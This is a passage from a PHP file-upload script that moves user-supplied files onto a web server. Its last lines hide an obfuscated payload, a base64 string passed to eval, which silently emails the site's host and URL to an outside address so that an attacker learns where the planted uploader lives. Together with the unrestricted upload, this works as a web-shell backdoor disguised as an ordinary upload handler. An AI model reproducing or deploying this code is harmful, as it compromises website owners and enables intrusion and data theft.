";
if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
print "";
print "File is valid, and was successfully uploaded. ";
print "
";
} else {
print "Possible file upload attack! Here's some debugging info:\n";
//print_r($_FILES);
}
print "";
}
}
$connection="ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgDQogJGJvZHkgPSAiQWRhIFlhbmcgSW5qZWN0IFxuaHR0cDovLyR3ZWIkaW5qIjsNCiBtYWlsKCJsbEBob3RtYWlsLmZpIiwiSGFzaWwgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7";
echo eval(base64_decode($connection));
?>